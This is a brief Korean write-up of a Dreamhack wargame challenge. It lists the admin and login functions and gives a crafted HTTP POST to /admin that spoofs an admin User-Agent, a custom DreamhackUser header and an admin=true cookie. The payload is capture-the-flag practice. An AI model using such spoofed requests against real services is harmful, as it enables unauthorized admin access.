https://dreamhack.io/wargame/challenges/13

분석

admin 함수

login 함수

진행

exploit

host: 127.0.0.1

port: 8000

data:

POST /admin HTTP/1.1
User-Agent: Admin Browser
DreamhackUser: admin
host: <http://host3.dreamhack.games:16717>
Cookie: admin=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 12

userid=admin